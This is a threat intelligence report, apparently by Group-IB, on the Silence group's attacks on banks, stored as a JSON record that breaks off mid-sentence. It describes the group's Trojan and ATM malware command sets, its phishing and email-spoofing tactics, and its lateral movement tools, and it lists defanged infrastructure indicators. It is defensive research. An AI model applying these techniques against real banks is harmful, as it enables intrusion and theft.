{
	"id": "cd43f831-8729-4cf0-9f8e-85738a17ba4b",
	"created_at": "2026-04-29T08:22:06.156638Z",
	"updated_at": "2026-04-29T10:41:52.998259Z",
	"deleted_at": null,
	"sha1_hash": "600cac4b4fc9a9b6241a9177429d5ea474950633",
	"title": "Silence: Moving into the darkside",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 6078126,
	"plain_text": "1\r\nSeptember 2018 group-ib.com\r\nMOVING INTO THE DARKSIDE\n\nSilence\r\nMoving into the darkside\r\n2\r\nTABLE OF CONTENTS\r\nIntroduction 4\r\nKey findings 5\r\nSilence is a new threat to banks 5\r\nLanguage 5\r\nThefts 6\r\nGeography 6\r\nTools 7\r\nInitial steps 7\r\nPhishing emails 7\r\nServer infrastructure 8\r\nSilence: the development of tools and types of attacks 9\r\nToolbox 10\r\nSilence 10\r\nAtmosphere 13\r\nUndernet DDoS bot 16\r\nSmoke bot 17\r\nInfection 18\r\nEmails 18\r\nMail servers 21\r\nLateral movement 23\r\nRemote Access 25\r\nTargets 26\r\nAWS CBR 26\r\nATMs 28\r\nCard processing 30\n\n3\r\nHunting (CHAPTER IS NOT AVAILABLE)\r\nMail servers —\r\nC\u0026C servers —\r\nTechnical description of the tools 32\r\nAttachments 32\r\nSilence Trojan 37\r\nSilence.Downloader 38\r\nPatched Kikothac 40\r\nSilence.MainModule 45\r\nSilence.SurveillanceModule 53\r\nSilence.ProxyBot 54\r\nSilence.ProxyBot.Net 57\r\nSilence ATM pack 60\r\nAtmosphere.Dropper 60\r\nAtmosphere.Injector 62\r\nAtmosphere 62\r\nOther programs 73\r\nUtilities 73\r\nPerl IRC DDoS bot 76\r\nIndicators 81\r\nHashes 81\r\nE-mails 82\r\nIPs 83\r\nDomains 85\r\nFile system artifacts 86\r\nSuricata rules —\r\nYARA rules —\n\n4\r\nINTRODUCTION\r\nIn August 2017, the National Bank of Ukraine warned state-owned and private\r\nbanks across the country about a large-scale phishing attack. The threat actor\r\nused an exploit from the arsenal of the state-sponsored hacker group APT28.\r\nHowever, the tool, as Group-IB discovered, was modified to target banks. It also\r\nappeared that the authors of the phishing emails had in-depth knowledge of\r\nreverse engineering.\r\nAt the time, the National Bank of Ukraine linked the attack with a new wave of\r\nthe NotPetya ransomware outbreak, but these were not pro-government hackers.\r\nInitial impressions would indicate that the targeted attack was on par with the\r\nworks of Cobalt or MoneyTaker. 
This hypothesis went unproven. On investigation,\r\nthe adversaries were a young and active hacker group who, like young smart\r\ntechnical specialists, learned very fast and from their own mistakes.\r\nThe new threat actor group was eventually named Silence. They were identified\r\nand named first in reports by anti-virus vendors; however, until the publication\r\nof this report, no detailed technical analysis of Silence or their operations had\r\nbeen conducted.\r\nFinancially motivated APT groups which focus their efforts on targeted attacks on the\r\nfinancial sector, such as Anunak, Corkow and Buhtrap, usually managed botnets\r\nusing developed or modified banking Trojans. Silence is different. Even at the\r\nbeginning of their journey, in the summer of 2016, Silence was not able to hack\r\nbanking systems and actually seemed to learn on the job by carefully analyzing\r\nthe experiences, tactics and the tools of other groups. They tried new techniques\r\nto steal from banking systems, including AWS CBR (the Russian Central Bank’s\r\nAutomated Workstation Client), ATMs, and card processing.\r\nThis report details the results of our investigation, review of attacks and thefts\r\nby Silence, and analysis of the tools, tactics and procedures used to target financial\r\ninstitutions. This report serves as a contribution to the Whitehat Security\r\ncommunity from Group-IB and provides technical descriptions of the methods\r\nand technologies that can be used to detect and track this group. We have\r\nalso included a detailed analysis of the toolset created by Silence, indicators of\r\ncompromise and other data for successful detection of Silence's attacks.\r\nSILENCE is a new and active criminal APT group, who adapt\r\nquickly from their own mistakes and adopt TTPs of other\r\ngroups.\n\n5\r\nKEY FINDINGS\r\nSilence is a new threat to banks\r\nGroup-IB detected the first incidents relating to Silence in June 2016. 
At that time,\r\nthe cyber criminals were just beginning to test their capabilities. One of Silence’s\r\nfirst targets was a Russian bank, where they tried to attack AWS CBR. After this, the\r\nhackers \"took a moment of silence\". It was later discovered that this is standard\r\npractice for Silence. They are selective in their attacks and wait for about three\r\nmonths between incidents, which is approximately three times longer than other\r\nfinancially motivated APT groups, like MoneyTaker, Anunak (Carbanak), Buhtrap or\r\nCobalt.\r\nSilence members constantly analyze the experience of other criminal groups. They\r\ntry to apply new techniques and ways of stealing from various banking systems,\r\nincluding AWS CBR, ATMs, and card processing. In a short period of time they\r\nstudied not only direct types of hacking, but also supply-chain attacks. In less\r\nthan a year, the amount of funds stolen by Silence has increased fivefold.\r\nLanguage\r\nAs with most financially-motivated APT groups, the members of Silence are\r\nRussian speakers, which is evidenced by the language of commands, priorities in\r\nlocating leased infrastructure, the choice of Russian-speaking hosting providers\r\nand the location of the targets.\r\n• The commands of Silence’s Trojan are Russian words typed using an English\r\nlayout:\r\nhtrjyytrn \u003e реконнект (reconnect)\r\nhtcnfhn \u003e рестарт (restart)\r\nytnpflfybq \u003e нетзадач (notasks)\r\n• The main targets are located in Russia, although phishing emails were sent to\r\nbank employees in more than 25 countries of Central and Western Europe, Africa\r\nand Asia.\r\n• To rent servers, Silence uses Russian-speaking hosting providers.\n\n6\r\nThefts\r\nTimeline of attacks\r\nJuly 2016 — A failed attempt to withdraw money via the Russian system of\r\ninterbank transactions AWS CBR. Hackers gained access to the system, but the\r\nattack wasn’t successful due to improper preparation of the payment order. 
The\r\nbank’s employees suspended the transaction and conducted incident response\r\nand remediation using their own resources. This resulted in the subsequent\r\nincident described below:\r\nAugust 2016 — Another attempt to attack the same bank. Just one month (!) after\r\ntheir failure with AWS CBR, Silence regained access to the servers of the bank\r\nand attempted another attack. To do this, they downloaded software to secretly\r\ntake screenshots and proceeded to investigate the operator’s work via video\r\nstream. This time, the bank asked Group-IB to respond to the incident. The attack\r\nwas stopped. However, the full log of the incident was unrecoverable, because in\r\nan attempt to clean the network, the bank’s IT team deleted the majority of the\r\nattacker’s traces.\r\nOctober 2017 — The first successful theft by the group that we know about. This\r\ntime, Silence attacked ATMs and stole over $100,000 in just one night. In the same\r\nyear, they conducted DDoS attacks using the Perl IRC bot and public IRC chats to\r\ncontrol Trojans.\r\nAfter the failed attempt with the interbank transactions system in 2016, the\r\ncriminals did not try to withdraw money using the system, even after gaining\r\naccess to the servers of AWS CBR.\r\nFebruary 2018 — Successful attack using card processing. They picked up over\r\n$550,000 via ATMs of the bank’s counterpart.\r\nApril 2018 — In two months, the group returned to their proven method and\r\nwithdrew funds again through ATMs. During a single night they siphoned about\r\n$150,000. This time, Silence’s tools had been significantly modified: they were\r\nnot burdened with redundant features and ran stably without bugs.\r\nGeography\r\nSilence’s successful attacks currently have been limited to the CIS and Eastern\r\nEuropean countries. 
Their main targets are located in Russia, Ukraine, Belarus,\r\nAzerbaijan, Poland, and Kazakhstan.\r\nHowever, some phishing emails were sent to bank employees in more than 25\r\ncountries of Central and Western Europe, Africa and Asia including: Kyrgyzstan,\r\nArmenia, Georgia, Serbia, Germany, Latvia, Czech Republic, Romania, Kenya, Israel,\r\nCyprus, Greece, Turkey, Taiwan, Malaysia, Switzerland, Vietnam, Austria, Uzbekistan,\r\nGreat Britain, Hong Kong, and others.\r\n[Chart: distribution by domain zone; values 2302, 96, 67, 28, 17, 10, 8, 8 with labels RU, COM, OTHERS, UA, BY, PL, ORG, KZ]\n\n7\r\nTOOLS\r\nInitial steps\r\nAccording to Group-IB’s Forensics Laboratory, during the first attacks Silence\r\nused third-party tools and learned on the go. However, after some time they\r\nswitched from using third-party tools to developing their own and significantly\r\nimproved their tactics.\r\nDuring the first operations the cybercriminals used a third-party patched\r\nbackdoor, Kikothac, without access to its source code. They chose a Trojan which\r\nhad been known since November 2015 and did not require a lot of time for\r\nreverse engineering and back end implementation.\r\nThe usage of this disassembled backdoor indicates that the group started without\r\npreparation and the first operation was a mere attempt to test their capabilities.\r\nDevelopment of new tools\r\nLater, the criminals developed a unique set of tools to attack card processing and\r\nATMs. 
It included self-developed software:\r\n• Silence is a framework for attacks on infrastructure.\r\n• Atmosphere is a set of software for ‘jackpotting’ ATMs.\r\n• Farse is a utility for getting passwords from an infected computer.\r\n• Cleaner is a tool for deleting logs of the remote connection.\r\nBorrowed tools:\r\n• Smoke bot is a bot for conducting the first phase of infection.\r\n• Modified Perl IRC DDoS is a bot based on the Undernet DDoS bot for\r\nconducting DDoS attacks.\r\nPhishing emails\r\nAt the beginning, the group used hacked servers and compromised accounts for\r\ncampaigns, but later the criminals began to register phishing domains and create\r\nself-signed certificates.\r\nTo evade content filtering systems they used DKIM and SPF. To create ‘legitimate’\r\nemails purporting to be from the banks, the hackers used the banks’ domains that\r\ndid not have configured SPF records. The letters were sent from rented servers\r\nwith substituted technical headers. The attackers created lengthy and logical\r\ntexts and sent these with the names of bank employees to increase the success\r\nrate.\n\n8\r\nThe emails contained decoy Microsoft Office Word documents weaponized with\r\nexploits for the CVE-2017-0199, CVE-2017-11882+CVE-2018-0802, CVE-2017-0262,\r\nand CVE-2018-8174 vulnerabilities. Apart from the exploits, there were emails\r\nwith attached CHM files, which is not common, and .LNK shortcuts launching\r\nPowerShell and JavaScript code.\r\nRemote control and persistence\r\nThe operator usually conducts the attack using a Linux machine with the WinExe\r\nutility (the equivalent of PsExec under Linux), which can launch software on the\r\nremote Windows node via the SMB protocol.\r\nAfter it is established on the system, the Silence Trojan installs a Meterpreter\r\nstager. To gain access to compromised computers, the cybercriminals use\r\nRAdmin. 
It is software used by many administrators in banks to remotely control\r\nworkstations.\r\nServer infrastructure\r\nThe servers rented by the attackers to conduct phishing attacks are located in\r\nRussia and the Netherlands. For the C\u0026C servers, they use a Ukrainian hosting\r\nprovider that allows placement of practically any content, including banned\r\ninformation, malicious software and files. Silence rented several servers at\r\nMaxiDed, whose infrastructure was banned by Interpol in May 2018.\n\n9\r\nSilence: the development of tools and types of attacks\r\n[Figure: timeline. JUN 2016 Unsuccessful ARM CBR attack; JUL 2016 Silence.ProxyBot; JUL 2016 Silence.ShadowingModule; AUG 2016 Silence.ProxyBot; SEP 2016 Silence.Downloader; NOV 2016 Silence.MainModule; MAR 2017 Silence.ProxyBot.Net; JUN 2017 Silence.MainModule; JUL 2017 Silence.MainModule; AUG 2017 Silence.Downloader, Silence.MainModule; OCT 2017 Atmosphere, Atmosphere.Injector, Atmosphere.Dropper; OCT 2017 Silence.ProxyBot; NOV 2017 ATM attack; JAN 2018 Silence.ProxyBot.Net; FEB 2018 Card Processing attack; MAR 2018 Silence.ProxyBot; APR 2018 ATM attack; APR 2018 Atmosphere, Atmosphere.Dropper, Silence.Downloader]\n\n10\r\nTOOLBOX\r\nAn important feature of the Silence group is the use of their unique self-developed\r\ntools. Such tools include:\r\n• Silence, a framework which the group is named after;\r\n• Atmosphere pack, a unique set for attacking ATMs;\r\n• Farse, a utility for getting passwords from the infected computer;\r\n• Cleaner, a tool for deleting logs of the remote connection.\r\nSilence\r\nThe unique Silence framework used by the group is modular. 
It consists of the\r\nfollowing components (discovered by us; there could be more):\r\n• Silence.Downloader loader;\r\n• Main module called Silence and a patched backdoor called Kikothac;\r\n• Silence.SurveillanceModule, a module for spying on users;\r\n• Silence.ProxyBot proxy.\r\nThe main module can load any other executable file, which does not limit the\r\nsystem’s functionality and gives room to extend features.\r\nAfter the attached exploit, disguised as an MS Office document, is opened, the\r\nSilence.Downloader loader for the Trojan is downloaded and installed. The loader\r\nadds itself to startup and waits for the command to download and launch the\r\nnext stage. If the server is of no interest to the attacker, the bot executes a self-destruct command.\r\n[Diagram: infection chain. Email with exploit or script -\u003e Silence.Downloader -\u003e Silence or patched Kikothac -\u003e Meterpreter, Silence.SurveillanceModule, Silence.ProxyBot. Exchange between users, the bot and the Silence C\u0026C: registration, command request, shell command, download \u0026 execute, results]\n\n11\r\nThe main body of the Silence Trojan also adds itself to startup after the launch.\r\nThen it registers on the server and enters a command reception/execution loop.\r\nThe main task of the Trojan is to execute remote commands in the command\r\ninterpreter as well as download and launch arbitrary programs.\r\nBelow is a table of C\u0026C commands that the malware executes:\r\nCommand | Type of command / Russian text | Function\r\nhtrjyytrn | reconnect / реконнект | Terminate the command interpreter session, clear all temporary files, connect to C\u0026C \"from scratch\"\r\nhtcnfhn | restart / рестарт | Terminate the command interpreter session and restart it\r\nytnpflfybq | notasks / нетзадач | No operation\r\n#wget | wget | Download a file from a remote server and save it in the current directory. Accepts two parameters: URL and file name\r\nshell\\n | shell | Launch the command interpreter\r\n\\n\u003cany other string\u003e | run | Execute an arbitrary OS command using the command interpreter\r\n[Diagram: Silence modules (Silence.Downloader, Silence.MainModule, Silence.ProxyBot, Silence.SurveillanceModule) and the MainModule commands htrjyytrn, htcnfhn, ytnpflfybq, #wget, shell\\n, \\n\u003cany other string\u003e]\r\nTo enter standalone segments of a corporate network, Silence downloads\r\nthe ProxyBot module. The purpose of this software is to redirect, through an\r\ninfected computer, traffic from the external C\u0026C server to the local nodes of the\r\ncompromised network, which are not accessible from outside. We discovered two\r\nversions of the program: one in Delphi and one in C#.\r\nTo monitor legitimate activity of the victim bank’s users and financial operators,\r\nthe attackers installed SurveillanceModule, which secretly took screenshots to\r\ncombine them into a pseudo stream.\r\nAt the last stage of the attack, the bot installed a Meterpreter stager into the\r\nsystem, which automates navigation inside the network.\r\nHaving analyzed the C\u0026C servers we also discovered the Kikothac backdoor, which\r\nwas communicating with one of the Silence servers, 46.183.221[.]89. At first, we\r\nthought that the software was not connected to Silence’s activity, but the time of\r\nuploading to the public sandbox HybridAnalysis corresponded with the time of the\r\nSilence attack. 
Moreover, the Kikothac sample was uploaded with the same name\r\nas the Silence Trojan on VirusTotal:\r\n[Diagram: netsrvc32.exe (patched Kikothac) and apcs.exe, uploaded to Hybrid Analysis on 2016-07-08; patched Kikothac and ProxyBot; Kikothac uploaded to VT on 2016-08-09; ProxyBot, July 15th 2016. ProxyBot exchange between users, ProxyBot and the C\u0026C: request command, command, proxied request, answer, returns results]\n\n13\r\nThrough in-depth analysis, we discovered that the reference to the original\r\naddress of the C\u0026C server was gone, and the code responsible for connecting to\r\nthe server uses a reference to an address which was written over statically-linked code generated by the compiler:\r\nIn addition, all Kikothac commands begin with the # character, including the\r\ncommand for downloading files from web servers, #wget. The same command is\r\nimplemented in the Silence Trojan. This is the only command there that starts with\r\nthe # character. Any other string not included in the list of Kikothac commands\r\nis automatically sent to the command interpreter cmd.exe for execution. Silence\r\ndoes the very same thing. For example, let’s look at two Kikothac commands\r\nbelow. The full list of commands is quite long and is provided in the Technical\r\nDescription of the Tools section:\r\nCommand | Function\r\n#wget | Download the file to an infected device. Bot accepts two parameters: URL and file name.\r\nAny other string | Send the string to cmd.exe.\r\nAs we can see, both commands are used in the Silence Trojan. They duplicate the\r\norder, the type of arguments, and the logic. This suggests that to control patched\r\nKikothac, the threat actors developed a back end, which was later used for the\r\nSilence Trojan.\r\nAtmosphere\r\nTo control the ATM dispenser, Silence uses a unique software called Atmosphere.\r\nOver time the Trojan has significantly evolved to address the needs of the\r\ncriminals. 
For example, the developers have changed the logic of injection into\r\nprocesses and added a flexible injector, which has expanded the list of targeted\r\nATMs. They have also removed the redundant features that interrupted the\r\noperation or were not used by the criminals. For example, the last version of the\r\nsoftware didn’t process commands from the PIN pad and the generated log got\r\nsmaller. In the initial stages, the software was recompiled a lot, which resulted in\r\nseveral unsuccessful cashout attempts.\n\n14\r\nThe hackers remotely install Atmosphere.Dropper on the ATM. The software\r\ncontains a .DLL library, which is the main body of the Atmosphere Trojan. After\r\nthe body is extracted, the dropper injects the library into the fwmain32.exe\r\nprocess. This enables the threat actor to remotely control the dispenser. In the\r\nfirst versions, there was a way to control the dispenser using the PIN pad, but later\r\nthese features were deleted.\r\nCommand | Function\r\n\"B\" | Get information on the content of ATM cassettes. In addition, the string \"cash units info received\" is added into the log.\r\n\"A\" | Get information on the content of ATM cassettes without logging.\r\n\"Q\" | Get information on the content of ATM cassettes.\r\n\"D\" | One-time withdrawal of notes of the specific face value from the ATM.\r\n\"H\" | Suspend all threads in the process except its own. Then use the functions GetThreadContext + SetThreadContext to redirect their execution to its own function.\r\n\"M\", \"R\", \"S\", \"P\", \"T\", \"L\" | Record the output of the last command into the C:\\intel\\\u003cchrs\u003e.007 file. This command is also executed after any other by default.\r\n[Diagram: Dropper extracts Atmosphere and injects it into the hardcoded dispenser’s process; Injector injects a given library into a specified process]\n\n15\r\nThe program receives commands via files with a specific extension. 
The\r\nsoftware reads commands, executes them, and then, as the author intended,\r\nit should overwrite the file with gibberish and delete it to hamper the work of\r\nforensics experts. However, the software logic contains an error, which results in\r\nthe nonsensical text being written at the end of the file instead of over everything.\r\nThis mistake is present in other software used by Silence, which supports the\r\nhypothesis of a single author. For example, the same piece of code is used in the\r\nprogram for clearing the connection logs of RAdmin.\r\nAs part of incident response activities in one of the banks, Group-IB forensic\r\nspecialists discovered about 11 samples of Atmosphere software, compiled at\r\ndifferent times with slight changes. In one of the directories containing the Trojan\r\nwe also discovered scripts for the command interpreter and a separate injector,\r\nwhich accepted a path to the DLL library as an argument, and an identifier of the\r\nprocess where it should inject the library. However, the scripts passed the target\r\nprocess name instead of the process identifier, which resulted in an unsuccessful\r\nattempt to take control over the dispenser.\n\n16\r\nUndernet DDoS bot\r\nWhile analyzing one of the servers of Silence, we discovered a DDoS bot called\r\nPerl IrcBot. On April 20, 2017, phishing emails were sent from the driley123@bellsouth[.]net\r\naddress. The emails contained an exploit, which downloaded\r\nSilence.Downloader with the address of the C\u0026C server, 92.222.68[.]32, on a machine.\r\nPerl IrcBot for DDoS attacks was available at hxxp://92.222.68[.]32/bot.pl and\r\nhxxp://92.222.68[.]32/wolf/ until June 18, 2018.\r\nThe program was first mentioned on a Spanish forum in messages dated 2014:\r\nhxxps://forum.voidsec[.]com/thread-93.html. 
There are also modifications of\r\nthe bot available online at: hxxps://github[.]com/H1R0GH057/Anonymous/blob/master/ircabuse.pl\r\nand hxxps://gist.github[.]com/dreadpiratesr/7bccc6eed49150a8564a.\r\nThe version used by Silence is based on the Undernet DDoS Bot\r\n(second link), according to the unique string \"PRIVMSG : 4,1 [Help] 9,1 Undernet\r\nPerlBot Main Help:\".\r\nThis software is controlled using IRC messages. There were two servers used:\r\n1. ira.pubcs16[.]ro, which is a public server of Counter-Strike players, via the #test\r\nchannel. Later they used the #PMA channel;\r\n2. piratesofcyber[.]tk.\r\n[Diagram: infrastructure graph dated 2017-04-20; hash 081ee959cbe6bc7dde7a6d13168e4fb4; two shells uploaded to VT on 2017-09-17; Silence.Downloader compiled on 2017-04-19; IRC DDoS bot, DDoS Perl IrcBotV1.0, Spanish vars; edges labelled IP, http, DNS, #]\n\n17\r\nSmoke Bot\r\nOne of the English-language emails sent in 2017 contained a JavaScript loader\r\nwhich installed Smoke Bot into the system. Smoke Bot was put up for sale on\r\nunderground forums in 2011. The seller is a Russian-speaking hacker named\r\nSmokeLdr. Apart from downloading and execution of arbitrary files, Smoke Bot has\r\nthe following features:\r\n• collection of credentials from browsers, mail programs and other software;\r\n• collection of email addresses from saved email accounts;\r\n• interception of data input into the browser;\r\n• interception of email and FTP passwords in real time;\r\n• ability to collect files with specific criteria;\r\n• DDoS module;\r\n• TeamViewer module;\r\n• cryptocurrency mining module.\n\n18\r\nINFECTION\r\nEmails\r\nThe infection vector used by Silence is typical: phishing emails with attachments\r\ncontaining exploits or malicious scripts. 
The senders masquerade as bank\r\nemployees, and while the email lacks design elements (pictures, HTML layout), the\r\ntext is logical and inspires trust. Unlike, for example, Cobalt phishing emails, which\r\nare created carelessly and rely on their mass nature, Silence emails are tidy and\r\ntargeted.\r\nFor example, on August 18, 2017, the Central Bank of Ukraine notified\r\nfinancial institutions about an upcoming ransomware attack (https://www.bankinfosecurity.com/ukraine-central-bank-detects-massive-attack-preparation-a-10209).\r\nWe believe that the message was the result of a phishing\r\ncampaign by Silence against the banks in Ukraine, Kazakhstan, and Russia.\r\nA unique feature of the campaign is the use of an exploit for the CVE-2017-0262\r\nvulnerability. The exploit is believed to be owned by the state-sponsored hacker\r\ngroup APT28. To conduct the campaign, the hackers used a compromised server.\r\nOn May 9, 2017, ESET published a report on the tools of the APT28 group (https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/).\r\nThe approach to infecting a system and the capabilities\r\nof the attachment from the Silence email correspond to the published report.\r\nHowever, we discovered a modification of the exploit at the level of assembler\r\ninstructions, so-called byte patching:\n\n19\r\nThis means that the author didn’t have the source code or the builder, so he had\r\nto use a fixed jump address. Therefore, the author had to write the payload to the\r\nfixed address. It is worth noting that to implement such a modification one needs\r\nquite advanced expertise in reverse engineering.\r\nLater, there was a campaign with a CHM file. This is the file format of compiled\r\nWindows help files. On October 13, 2017, the attackers used the names of several\r\nRussian banks to send phishing emails. One of the emails purported to be from\r\nthe Russian bank Fin Service. 
For this attack, the criminals registered a domain,\r\nfcbank[.]ru.\n\n20\r\nThis format allows criminals to run JavaScript and execute remote VBScript and/or\r\nPowerShell code by calling mshta.exe or powershell.exe.\r\nAlthough the vector is not new and was used even back in 2015 to deliver malware,\r\nthe use of CHM files is not at all typical for attacks on the CIS and, in some cases,\r\nhelps to evade discovery and successfully get through corporate security systems.\r\nOne of the emails was sent to CERT-GIB (Group-IB’s Computer Emergency\r\nResponse Team):\r\nThe attachment contained an archive with a .LNK shortcut, generated in such a way\r\nthat when opened it launched PowerShell, which downloaded and launched\r\nSilence.Downloader. The result of launching the attachment from the Silence\r\nemail is the installation of Silence.Downloader on the victim’s computer.\r\nOne of the emails in English contained a JavaScript. The letter purported to be\r\nfrom Royal Bank of Scotland (stated in the footer) with the sender \"HBCL inc\" \u003cinfo@finamnews019[.]xyz\u003e:\r\nAfter opening the JavaScript the computer downloaded and launched Smoke\r\nBot from the address 91.207.7[.]79, which is a C\u0026C server of Silence. Smoke Bot\r\ndownloaded additional modules from the cassocial[.]gdn and variiform[.]gdn\r\ndomains. The former domain resolved to 91.207.7[.]97. This server, 91.207.7[.]97,\r\nwas used by Silence to download Silence.Downloader in the email with the .LNK.\n\n21\r\nMail Servers\r\nTo send malicious emails, the group utilizes hacked servers and registers\r\n\"banking\" domains. They also use public mail services, like mail.com and att.net.\r\nIf a bank whose name was used for a campaign did not have correctly configured SPF\r\nrecords, the attackers used a hacked or rented server to send emails with replaced\r\nheaders. 
For example, the following servers were used to send emails with the\r\nnames of banks without configured SPF:\r\nIP | Real bank | Service provider | Country | Date\r\n5.200.55[.]198 | bankrab.ru | OOO IT-Grad | Russia | 07-2016\r\n185.7.30[.]137 | itbank.ru | VMLAB LLC VPS Customers | Russia | 06-2017\r\nWhen registering new domains for a server from which the emails will be sent, a\r\nself-signed certificate is issued. For more details, please refer to the Hunting\r\nsection. This way, the email passes the DKIM check. The following domain names\r\nwere registered using this method:\r\nDomain | IP | Service provider | Country | Date\r\ntrustintbank[.]org | 109.234.34[.]35 | VDSINA VDS Hosting | Russia | 2016-07\r\nitbank[.]us | 193.0.178[.]12 | PE Viktor Tyurin | Netherlands | 2016-07\r\nitrbank[.]ru | 31.31.204[.]161 | Reg.Ru | Russia | 2016-09\r\nitmbank[.]ru | 185.100.67[.]129 | Hoster.KZ | Kazakhstan | 2016-09\r\nitmbank[.]us | 46.30.43[.]83 | Eurobyte VPS | Russia | 2016-09\r\nmosfinbank[.]ru | 5.200.56[.]161 | OOO IT-Grad | | 2016-09\r\nmostbbank[.]ru | 31.31.204[.]161 | Reg.Ru | Russia | 2016-09\r\n | 77.246.145[.]86 | E-PLANET | Russia | 2017-06\r\n | 77.246.145[.]82 | | | 2017-06\r\nppfbank[.]ru | 185.158.154[.]147 | IT-GRAD 1Cloud LLC | Russia | 2017-06\r\nfbank[.]org | 185.158.154[.]17 | IT-GRAD 1Cloud LLC | Russia | 2017-06\r\n | 185.154.53[.]132 | | | 2017-06\r\ndgbank[.]ru | 158.255.0[.]35 | Mir Telematiki Ltd | Russia | 2017-09\r\nbankci[.]ru | 95.142.39[.]5 | Eurobyte VDS | Russia | 2017-09\r\n | 95.142.39[.]6 | Eurobyte VDS | Russia | 2017-09\r\ncsbank[.]ru | 185.180.231[.]63 | FirstByte | Russia | 2017-09\r\nfcbank[.]ru | 195.161.41[.]2 | Avguro Technologies Ltd. Hosting service provider | Russia | 2017-09\r\n | 81.177.135[.]99 | | | 2017-10\r\nmmibank[.]ru | 81.177.140[.]58 | Avguro Technologies Ltd. Hosting service provider | Russia | 2017-09\r\n | 81.177.6[.]226 | | | 2017-10\r\nspas-ibosberbank[.]ru | 185.235.130[.]69 | ON-LINE DATA LTD | Netherlands | 2018-01\r\nfpbank[.]ru | 217.28.213[.]250 | INTRELL-NET | Russia | 2018-05\r\n | 217.28.213[.]162 | | | 2018-05\r\n | 217.29.57[.]176 | | | 2018-05\r\nHacked servers used for sending emails:\r\nDomain | Date\r\ntvaudio[.]ru | 07-2016\r\nvivacity[.]ru | 08-2017\r\nfinamnews019[.]xyz | 10-2017\n\n23\r\nLATERAL MOVEMENT\r\nApart from malware, Silence uses some well-known legitimate utilities to\r\ncomplete their tasks. For example, to access compromised computers, the group\r\nuses winexe, which is a Linux utility for remote control of Windows-based\r\nmachines via the SMB protocol. Winexe is an open source project, which is available at\r\nhttps://sourceforge.net/projects/winexe/.\r\nTo access a Windows machine over SMB, several conditions must be met:\r\n• active Server Message Block (SMB) service, which is not blocked by a firewall;\r\n• active File and Print Sharing service;\r\n• disabled Simple File Sharing service;\r\n• available Admin$ network resource (hidden SMB object).\r\nTo access the Admin$ resource, which is used to launch programs, the program has\r\nto have credentials: login and password. Upon successful access to the target\r\nmachine, the c:\\Windows\\winexesvc.exe program is created and launched on the\r\nserver using Winexe.\r\nAfter gaining remote control of the target machine, hackers use Mimikatz-based software and Meterpreter capabilities to download data on user and\r\nadministrator accounts from the domain.\r\nTo get computer administrator privileges, LPE exploits are required.\r\nIt was confirmed that they used standalone LPE exploits: CVE-2008-4250, CVE-2017-0143, and CVE-2017-0263. Other samples were not recoverable. 
The group\r\nalso uses all LPE exploits provided by the Metasploit framework.\r\nTo retrieve passwords from RAM, the group used the Farse 6.1 utility, which\r\nis based on the source code of Mimikatz (hxxps://github[.]com/gentilkiwi/mimikatz).\r\nFarse is just an add-on for Mimikatz, which, when launched, extracts\r\ncredentials from lsass.exe and prints them to the standard output. In other\r\nwords, it is software which automates your work with Mimikatz.\n\n24\r\nFarse is developed by Silence. For detailed technical analysis, please refer to the\r\nTechnical Description of the Tools section.\r\nHackers used Nmap to scan the corporate network. The tool enabled them to\r\nbuild the network topology and identify vulnerable hosts, which they used to gain\r\naccess to other machines and administrator accounts.\r\nTo delete RAdmin logs, the group used self-developed software called Cleaner,\r\nwhich overwrites the specified file with gibberish. The software contains a logical\r\nerror and the data is added to the end of the document, not overwritten from the\r\nbeginning. The implementation is copied from Atmosphere.\n\n25\r\n[Diagram: ProxyBot exchange between users, ProxyBot and the C\u0026C: request command, command, proxied request, answer, returns results]\r\nREMOTE ACCESS\r\nAfter gaining control over the machine (using privilege escalation or a domain\r\nadministrator account), to further control it, the hackers install a remote control tool\r\ncalled RAdmin. The software is modified in such a way that it works hidden from\r\nthe user.\r\nAlongside RAdmin, the hackers also use standard access via RDP.\r\nTo do so, they patch termsrv.dll. In some cases Silence uses access via WEB RDP\r\n(which is a standard Windows service) using the HTTPS protocol.\r\nTo access the nodes in an internal corporate network that cannot be accessed\r\nfrom the outside, Silence uses unique software, which allows proxying traffic\r\nwith backconnect. 
The first version of this software was written in Delphi. It is classified as Silence.ProxyBot. For a detailed description, please refer to the Technical Description of the Tools section. After a while, Silence migrated to a .NET version of the software, called Silence.ProxyBot.NET.\r\nThus, any computer becomes a proxy with backconnect and an intermediate node for accessing critical servers in the network.\r\nAfter a thorough investigation of the protocol used to interact with the backconnect server, we developed software for detecting Silence servers. This data was used to detect the infrastructure of the criminal group. The algorithm is described in the Hunting section.\r\nTARGETS\r\nThe first incident related to Silence that we know about happened in July 2016. The hackers tried to withdraw money by manually creating a payment order in the interbank transaction system AWS CBR. However, the payment order was created incorrectly. The bank’s employees discovered the suspicious activity in time and took countermeasures using their own resources.\r\nDespite the reaction of the security team and a failed first attempt, the hackers regained access to the servers of this bank and took a second shot in August 2016. For this, they downloaded software for secretly taking screenshots and proceeded to study the operator’s work via a pseudo-video stream.\r\nIn 2017, Silence began to attack ATMs, and this was the first known case of successful money withdrawal. Over one night, the ATMs of one bank spat out over $100,000. In the same year, they conducted DDoS attacks using the Perl IRC bot and public IRC chats to control Trojans.\r\nIn 2018, the hackers attacked via card processing. They successfully withdrew over $550,000 in one weekend through the ATMs of the bank’s partner.\r\nIn April 2018, the group returned to the proven method and withdrew funds again through ATMs. 
During a single night they siphoned about $150,000.\r\nAWS CBR\r\nAt the time of the incident response to the first attack in 2016, the shared directory where payment batches for AWS CBR were uploaded was accessible from the workstations of 2 employees. They worked with correspondent accounts, so the machines involved were the server with the above-mentioned directory and the terminal server. Below is the chain of events that we reconstructed during incident response.\r\nOn 13.06.2016, the hackers used an administrator account and the domain controller to install the winexesvc service. This service was launched as an OS service from the C:\\Windows\\winexesvc.exe file. It allows commands issued from GNU/Linux systems to be executed remotely on Windows computers over the SMB protocol. Presumably, the account was compromised using Mimikatz or a variant of it, although there were no signs of its operation.\r\nOn 06.07.07.2016, the criminals attempted to steal money from the bank’s AWS CBR. Group-IB experts believe that the attackers hit a processing error on a payment batch in AWS CBR while trying to spoof the payment details. After this, the bank’s security team tried to stop a second intrusion by the attackers. Despite their attempts, on 19.07.2016 the winexesvc service was installed again on the servers and workstations. This time, the criminals used a system administrator account.\r\nOn 30.07.2016, the remote control software RAdmin was installed on the server with the directory. The software ran covertly under the name svchost.exe. This software gave the attacker round-the-clock access to the bank’s network, 